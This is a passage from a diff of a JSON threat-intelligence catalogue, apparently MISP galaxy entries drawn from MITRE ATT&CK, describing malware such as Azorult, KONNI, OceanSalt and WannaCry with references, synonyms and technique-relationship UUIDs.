+ "type": "uses" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "970cdb5c-02fb-4c38-b17e-d6327cf3c810", + "tags": [ + 
"estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + } + ], + "uuid": "8c050cea-86e1-4b63-bf21-7af4fa483349", + "value": "Micropsia - S0339" + }, + { + "description": "[Azorult](https://attack.mitre.org/software/S0344) is a commercial Trojan that is used to steal information from compromised hosts. [Azorult](https://attack.mitre.org/software/S0344) has been observed in the wild as early as 2016.\nIn July 2018, [Azorult](https://attack.mitre.org/software/S0344) was seen used in a spearphishing campaign against targets in North America. [Azorult](https://attack.mitre.org/software/S0344) has been seen used for cryptocurrency theft. (Citation: Unit42 Azorult Nov 2018)(Citation: Proofpoint Azorult July 2018)", + "meta": { + "external_id": "S0344", + "mitre_platforms": [ + "Windows" + ], + "refs": [ + "https://attack.mitre.org/software/S0344", + "https://researchcenter.paloaltonetworks.com/2018/11/unit42-new-wine-old-bottle-new-azorult-variant-found-findmyname-campaign-using-fallout-exploit-kit/", + "https://www.proofpoint.com/us/threat-insight/post/new-version-azorult-stealer-improves-loading-features-spreads-alongside" + ], + "synonyms": [ + "Azorult" + ] + }, + "related": [ + { + "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "ba8e391f-14b5-496f-81f2-2d5ecd646c1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "tags": [ + 
"estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "dcaa092b-7de9-4a21-977f-7fcb77e89c48", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "1c338d0f-a65e-4073-a5c1-c06878849f21", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f3c544dc-673c-4ef3-accb-53229f1ae077", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "tags": [ + 
"estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + } + ], + "uuid": "f9b05f33-d45d-4e4d-aafe-c208d38a0080", + "value": "Azorult - S0344" + }, + { + "description": "[Denis](https://attack.mitre.org/software/S0354) is a Windows backdoor and Trojan.(Citation: Cybereason Oceanlotus May 2017)", + "meta": { + "external_id": "S0354", + "mitre_platforms": [ + "Windows" + ], + "refs": [ + "https://attack.mitre.org/software/S0354", + "https://www.cybereason.com/blog/operation-cobalt-kitty-apt" + ], + "synonyms": [ + "Denis" + ] + }, + "related": [ + { + "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "tags": [ + 
"estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b9f5dbe2-4c55-4fc5-af2e-d42c1d182ec4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b2001907-166b-4d71-bb3c-9d26c871de09", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "cc7b8c4e-9be0-47ca-b0bb-83915ec3ee2f", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + } + ], + "uuid": "f25aab1a-0cef-4910-a85d-bb38b32ea41a", + "value": "Denis - S0354" + }, + { + "description": "[Seasalt](https://attack.mitre.org/software/S0345) is malware that has been linked to [APT1](https://attack.mitre.org/groups/G0006)'s 2010 operations. 
It shares some code similarities with [OceanSalt](https://attack.mitre.org/software/S0346).(Citation: Mandiant APT1 Appendix)(Citation: McAfee Oceansalt Oct 2018)", + "meta": { + "external_id": "S0345", + "mitre_platforms": [ + "Windows" + ], + "refs": [ + "https://attack.mitre.org/software/S0345", + "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report-appendix.zip", + "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-operation-oceansalt.pdf" + ], + "synonyms": [ + "Seasalt" + ] + }, + "related": [ + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "478aa214-2ca7-4ec0-9978-18798e514790", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + 
"type": "uses" + }, + { + "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + } + ], + "uuid": "b45747dc-87ca-4597-a245-7e16a61bc491", + "value": "Seasalt - S0345" + }, + { + "description": "[OceanSalt](https://attack.mitre.org/software/S0346) is a Trojan that was used in a campaign targeting victims in South Korea, United States, and Canada. [OceanSalt](https://attack.mitre.org/software/S0346) shares code similarity with [SpyNote RAT](https://attack.mitre.org/software/S0305), which has been linked to [APT1](https://attack.mitre.org/groups/G0006).(Citation: McAfee Oceansalt Oct 2018)", + "meta": { + "external_id": "S0346", + "mitre_platforms": [ + "Windows" + ], + "refs": [ + "https://attack.mitre.org/software/S0346", + "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-operation-oceansalt.pdf" + ], + "synonyms": [ + "OceanSalt" + ] + }, + "related": [ + { + "dest-uuid": "cc7b8c4e-9be0-47ca-b0bb-83915ec3ee2f", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": 
"f879d51c-5476-431c-aedf-f14d207e4d1e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "6aac77c4-eaf2-4366-8c13-ce50ab951f38", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + } + ], + "uuid": "288fa242-e894-4c7e-ac86-856deedf5cea", + "value": "OceanSalt - S0346" + }, + { + "description": "[AuditCred](https://attack.mitre.org/software/S0347) is a malicious DLL that has been used by [Lazarus Group](https://attack.mitre.org/groups/G0032) during their 2018 attacks.(Citation: TrendMicro Lazarus Nov 2018)", + "meta": { + "external_id": "S0347", + "mitre_platforms": [ + "Windows" + ], + "refs": [ + "https://attack.mitre.org/software/S0347", + "https://blog.trendmicro.com/trendlabs-security-intelligence/lazarus-continues-heists-mounts-attacks-on-financial-organizations-in-latin-america/" + ], + "synonyms": [ + "AuditCred", + "Roptimizer" + ] + }, + "related": [ + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "478aa214-2ca7-4ec0-9978-18798e514790", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": 
"f879d51c-5476-431c-aedf-f14d207e4d1e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + } + ], + "uuid": "24b4ce59-eaac-4c8b-8634-9b093b7ccd92", + "value": "AuditCred - S0347" + }, + { + "description": "[SpeakUp](https://attack.mitre.org/software/S0374) is a Trojan backdoor that targets both Linux and OSX devices. It was first observed in January 2019. 
(Citation: CheckPoint SpeakUp Feb 2019)", + "meta": { + "external_id": "S0374", + "mitre_platforms": [ + "Linux", + "macOS" + ], + "refs": [ + "https://attack.mitre.org/software/S0374", + "https://research.checkpoint.com/speakup-a-new-undetected-backdoor-linux-trojan/" + ], + "synonyms": [ + "SpeakUp" + ] + }, + "related": [ + { + "dest-uuid": "e3a12395-188d-4051-9a16-ea8e14d07b88", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "a93494bb-4b80-4ea1-8695-3236a49916fd", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "cc7b8c4e-9be0-47ca-b0bb-83915ec3ee2f", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "be2dcee9-a7a7-4e38-afd6-21b31ecc3d63", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "c0a384a4-9a25-40e1-97b6-458388474bc8", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7e150503-88e7-4861-866b-ff1ac82c4475", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": 
"03d7999c-1f4c-42cc-8373-e7690d318104", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + } + ], + "uuid": "a5575606-9b85-4e3d-9cd2-40ef30e3672d", + "value": "SpeakUp - S0374" + }, + { + "description": "[KONNI](https://attack.mitre.org/software/S0356) is a Windows remote administration too that has been seen in use since 2014 and evolved in its capabilities through at least 2017. [KONNI](https://attack.mitre.org/software/S0356) has been linked to several campaigns involving North Korean themes.(Citation: Talos Konni May 2017) [KONNI](https://attack.mitre.org/software/S0356) has significant code overlap with the [NOKKI](https://attack.mitre.org/software/S0353) malware family. 
There is some evidence potentially linking [KONNI](https://attack.mitre.org/software/S0356) to [APT37](https://attack.mitre.org/groups/G0067).(Citation: Unit 42 NOKKI Sept 2018)(Citation: Unit 42 Nokki Oct 2018)", + "meta": { + "external_id": "S0356", + "mitre_platforms": [ + "Windows" + ], + "refs": [ + "https://attack.mitre.org/software/S0356", + "https://blog.talosintelligence.com/2017/05/konni-malware-under-radar-for-years.html", + "https://researchcenter.paloaltonetworks.com/2018/09/unit42-new-konni-malware-attacking-eurasia-southeast-asia/", + "https://researchcenter.paloaltonetworks.com/2018/10/unit42-nokki-almost-ties-the-knot-with-dogcall-reaper-group-uses-new-malware-to-deploy-rat/" + ], + "synonyms": [ + "KONNI" + ] + }, + "related": [ + { + "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "ba8e391f-14b5-496f-81f2-2d5ecd646c1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "970cdb5c-02fb-4c38-b17e-d6327cf3c810", + "tags": [ + 
"estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "30973a08-aed9-4edf-8604-9084ce1b5c4f", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + } + ], + "uuid": "86b92f6c-9c05-4c51-b361-4c7bb13e21a1", + "value": "KONNI - S0356" + }, + { + "description": "[Remexi](https://attack.mitre.org/software/S0375) is a Windows-based Trojan that was developed in the C programming language.(Citation: Securelist Remexi Jan 2019)", + "meta": { + "external_id": "S0375", + "mitre_platforms": [ + "Windows" + ], + "refs": [ + "https://attack.mitre.org/software/S0375", + 
"https://securelist.com/chafer-used-remexi-malware/89538/" + ], + "synonyms": [ + "Remexi" + ] + }, + "related": [ + { + "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "d54416bd-0803-41ca-870a-ce1af7c05638", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "514ede4c-78b3-4d78-a38b-daddf6217a79", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", + "tags": [ + 
"estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "4ae4f953-fe58-4cc8-a327-33257e30a830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "92d7da27-2d91-488e-a00c-059dc162766d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "30973a08-aed9-4edf-8604-9084ce1b5c4f", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + } + ], + "uuid": "ecc2f65a-b452-4eaf-9689-7e181f17f7a5", + "value": "Remexi - S0375" + }, + { + "description": "[WannaCry](https://attack.mitre.org/software/S0366) is ransomware that was first seen in a global attack during May 2017, which affected more than 150 countries. 
It contains worm-like features to spread itself across a computer network using the SMBv1 exploit EternalBlue.(Citation: LogRhythm WannaCry)(Citation: US-CERT WannaCry 2017)(Citation: Washington Post WannaCry 2017)(Citation: FireEye WannaCry 2017)", + "meta": { + "external_id": "S0366", + "mitre_platforms": [ + "Windows" + ], + "refs": [ + "https://attack.mitre.org/software/S0366", + "https://logrhythm.com/blog/a-technical-analysis-of-wannacry-ransomware/", + "https://www.us-cert.gov/ncas/alerts/TA17-132A", + "https://www.washingtonpost.com/business/economy/more-than-150-countries-affected-by-massive-cyberattack-europol-says/2017/05/14/5091465e-3899-11e7-9e48-c4f199710b69_story.html?utm_term=.7fa16b41cad4", + "https://www.fireeye.com/blog/threat-research/2017/05/wannacry-malware-profile.html", + "https://www.secureworks.com/research/wcry-ransomware-analysis" + ], + "synonyms": [ + "WannaCry", + "WanaCry", + "WanaCrypt", + "WanaCrypt0r", + "WCry" + ] + }, + "related": [ + { + "dest-uuid": "9db0cf3a-a3c9-4012-8268-123b9db6fd82", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "65917ae0-b854-4139-83fe-bf2441cf0196", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "348f1eef-964b-4eb6-bb53-69b3dcb0c643", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e358d692-23c0-4a31-9eb6-ecc13a8d7735", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "51dea151-0898-4a45-967c-3ebee0420484", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": 
"b80d107d-fa0d-4b60-9684-b0433e8bdba0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "478aa214-2ca7-4ec0-9978-18798e514790", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "428ca9f8-0e33-442a-be87-f869cb4cf73e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7d751199-05fa-4a72-920f-85df4506c76c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "3b3cbbe0-6ed3-4334-b543-3ddfd8c5642d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "20fb2507-d71c-455d-9b6d-6104461cf26b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": 